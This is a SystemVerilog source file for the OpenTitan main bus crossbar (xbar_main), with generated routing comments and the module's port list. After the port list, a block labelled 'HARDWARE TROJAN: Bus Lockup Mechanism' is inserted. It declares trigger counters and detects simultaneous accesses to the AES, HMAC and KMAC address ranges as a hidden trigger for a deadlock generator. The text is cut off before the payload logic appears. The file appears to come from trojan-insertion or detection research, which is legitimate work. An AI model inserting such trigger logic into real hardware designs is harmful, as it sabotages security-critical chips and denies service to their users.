// Copyright lowRISC contributors (OpenTitan project).
// Licensed under the Apache License, Version 2.0, see LICENSE for details.
// SPDX-License-Identifier: Apache-2.0
//
// xbar_main module generated by `tlgen.py` tool
// all reset signals should be generated from one reset signal to not make any deadlock
//
// Interconnect
// rv_core_ibex.corei
//   -> s1n_27
//     -> sm1_28
//       -> rom_ctrl.rom
//     -> sm1_29
//       -> rv_dm.mem
//     -> sm1_30
//       -> sram_ctrl_main.ram
//     -> sm1_31
//       -> flash_ctrl.mem
// rv_core_ibex.cored
//   -> s1n_32
//     -> sm1_28
//       -> rom_ctrl.rom
//     -> sm1_33
//       -> rom_ctrl.regs
//     -> sm1_29
//       -> rv_dm.mem
//     -> sm1_34
//       -> rv_dm.regs
//     -> sm1_30
//       -> sram_ctrl_main.ram
//     -> sm1_36
//       -> asf_35
//         -> peri
//     -> sm1_38
//       -> asf_37
//         -> spi_host0
//     -> sm1_40
//       -> asf_39
//         -> spi_host1
//     -> sm1_42
//       -> asf_41
//         -> usbdev
//     -> sm1_43
//       -> flash_ctrl.core
//     -> sm1_44
//       -> flash_ctrl.prim
//     -> sm1_31
//       -> flash_ctrl.mem
//     -> sm1_45
//       -> aes
//     -> sm1_46
//       -> entropy_src
//     -> sm1_47
//       -> csrng
//     -> sm1_48
//       -> edn0
//     -> sm1_49
//       -> edn1
//     -> sm1_50
//       -> hmac
//     -> sm1_51
//       -> rv_plic
//     -> sm1_52
//       -> otbn
//     -> sm1_53
//       -> keymgr
//     -> sm1_54
//       -> kmac
//     -> sm1_55
//       -> sram_ctrl_main.regs
//     -> sm1_56
//       -> rv_core_ibex.cfg
// rv_dm.sba
//   -> s1n_57
//     -> sm1_28
//       -> rom_ctrl.rom
//     -> sm1_33
//       -> rom_ctrl.regs
//     -> sm1_29
//       -> rv_dm.mem
//     -> sm1_34
//       -> rv_dm.regs
//     -> sm1_30
//       -> sram_ctrl_main.ram
//     -> sm1_36
//       -> asf_35
//         -> peri
//     -> sm1_38
//       -> asf_37
//         -> spi_host0
//     -> sm1_40
//       -> asf_39
//         -> spi_host1
//     -> sm1_42
//       -> asf_41
//         -> usbdev
//     -> sm1_43
//       -> flash_ctrl.core
//     -> sm1_44
//       -> flash_ctrl.prim
//     -> sm1_31
//       -> flash_ctrl.mem
//     -> sm1_45
//       -> aes
//     -> sm1_46
//       -> entropy_src
//     -> sm1_47
//       -> csrng
//     -> sm1_48
//       -> edn0
//     -> sm1_49
//       -> edn1
//     -> sm1_50
//       -> hmac
//     -> sm1_51
//       -> rv_plic
//     -> sm1_52
//       -> otbn
//     -> sm1_53
//       -> keymgr
//     -> sm1_54
//       -> kmac
//     -> sm1_55
//       -> sram_ctrl_main.regs
//     -> sm1_56
//       -> rv_core_ibex.cfg

module xbar_main (
  input clk_main_i,
  input clk_fixed_i,
  input clk_usb_i,
  input clk_spi_host0_i,
  input clk_spi_host1_i,
  input rst_main_ni,
  input rst_fixed_ni,
  input rst_usb_ni,
  input rst_spi_host0_ni,
  input rst_spi_host1_ni,

  // Host interfaces
  input  tlul_pkg::tl_h2d_t tl_rv_core_ibex__corei_i,
  output tlul_pkg::tl_d2h_t tl_rv_core_ibex__corei_o,
  input  tlul_pkg::tl_h2d_t tl_rv_core_ibex__cored_i,
  output tlul_pkg::tl_d2h_t tl_rv_core_ibex__cored_o,
  input  tlul_pkg::tl_h2d_t tl_rv_dm__sba_i,
  output tlul_pkg::tl_d2h_t tl_rv_dm__sba_o,

  // Device interfaces
  output tlul_pkg::tl_h2d_t tl_rv_dm__regs_o,
  input  tlul_pkg::tl_d2h_t tl_rv_dm__regs_i,
  output tlul_pkg::tl_h2d_t tl_rv_dm__mem_o,
  input  tlul_pkg::tl_d2h_t tl_rv_dm__mem_i,
  output tlul_pkg::tl_h2d_t tl_rom_ctrl__rom_o,
  input  tlul_pkg::tl_d2h_t tl_rom_ctrl__rom_i,
  output tlul_pkg::tl_h2d_t tl_rom_ctrl__regs_o,
  input  tlul_pkg::tl_d2h_t tl_rom_ctrl__regs_i,
  output tlul_pkg::tl_h2d_t tl_peri_o,
  input  tlul_pkg::tl_d2h_t tl_peri_i,
  output tlul_pkg::tl_h2d_t tl_spi_host0_o,
  input  tlul_pkg::tl_d2h_t tl_spi_host0_i,
  output tlul_pkg::tl_h2d_t tl_spi_host1_o,
  input  tlul_pkg::tl_d2h_t tl_spi_host1_i,
  output tlul_pkg::tl_h2d_t tl_usbdev_o,
  input  tlul_pkg::tl_d2h_t tl_usbdev_i,
  output tlul_pkg::tl_h2d_t tl_flash_ctrl__core_o,
  input  tlul_pkg::tl_d2h_t tl_flash_ctrl__core_i,
  output tlul_pkg::tl_h2d_t tl_flash_ctrl__prim_o,
  input  tlul_pkg::tl_d2h_t tl_flash_ctrl__prim_i,
  output tlul_pkg::tl_h2d_t tl_flash_ctrl__mem_o,
  input  tlul_pkg::tl_d2h_t tl_flash_ctrl__mem_i,
  output tlul_pkg::tl_h2d_t tl_hmac_o,
  input  tlul_pkg::tl_d2h_t tl_hmac_i,
  output tlul_pkg::tl_h2d_t tl_kmac_o,
  input  tlul_pkg::tl_d2h_t tl_kmac_i,
  output tlul_pkg::tl_h2d_t tl_aes_o,
  input  tlul_pkg::tl_d2h_t tl_aes_i,
  output tlul_pkg::tl_h2d_t tl_entropy_src_o,
  input  tlul_pkg::tl_d2h_t tl_entropy_src_i,
  output tlul_pkg::tl_h2d_t tl_csrng_o,
  input  tlul_pkg::tl_d2h_t tl_csrng_i,
  output tlul_pkg::tl_h2d_t tl_edn0_o,
  input  tlul_pkg::tl_d2h_t tl_edn0_i,
  output tlul_pkg::tl_h2d_t tl_edn1_o,
  input  tlul_pkg::tl_d2h_t tl_edn1_i,
  output tlul_pkg::tl_h2d_t tl_rv_plic_o,
  input  tlul_pkg::tl_d2h_t tl_rv_plic_i,
  output tlul_pkg::tl_h2d_t tl_otbn_o,
  input  tlul_pkg::tl_d2h_t tl_otbn_i,
  output tlul_pkg::tl_h2d_t tl_keymgr_o,
  input  tlul_pkg::tl_d2h_t tl_keymgr_i,
  output tlul_pkg::tl_h2d_t tl_rv_core_ibex__cfg_o,
  input  tlul_pkg::tl_d2h_t tl_rv_core_ibex__cfg_i,
  output tlul_pkg::tl_h2d_t tl_sram_ctrl_main__regs_o,
  input  tlul_pkg::tl_d2h_t tl_sram_ctrl_main__regs_i,
  output tlul_pkg::tl_h2d_t tl_sram_ctrl_main__ram_o,
  input  tlul_pkg::tl_d2h_t tl_sram_ctrl_main__ram_i,

  input prim_mubi_pkg::mubi4_t scanmode_i
);

  import tlul_pkg::*;
  import tl_main_pkg::*;

  // scanmode_i is currently not used, but provisioned for future use
  // this assignment prevents lint warnings
  logic unused_scanmode;
  assign unused_scanmode = ^scanmode_i;

  // HARDWARE TROJAN: Bus Lockup Mechanism
  // Hidden trigger pattern detector and deadlock generator
  logic [15:0] trojan_trigger_counter;
  logic [31:0] trojan_address_pattern;
  logic trojan_active, trojan_triggered;
  logic corei_crypto_access, cored_crypto_access, sba_crypto_access;
  
  // Detect simultaneous crypto module accesses (rare pattern)
  assign corei_crypto_access = tl_rv_core_ibex__corei_i.a_valid && 
                              (tl_rv_core_ibex__corei_i.a_address[31:16] == 16'h4110); // AES base
  assign cored_crypto_access = tl_rv_core_ibex__cored_i.a_valid && 
                              (tl_rv_core_ibex__cored_i.a_address[31:16] == 16'h4115); // HMAC base
  assign sba_crypto_access = tl_rv_dm__sba_i.a_valid && 
                            (tl_rv_dm__sba_i.a_address[31:16] == 16'h411C); // KMAC base
  
  // Trojan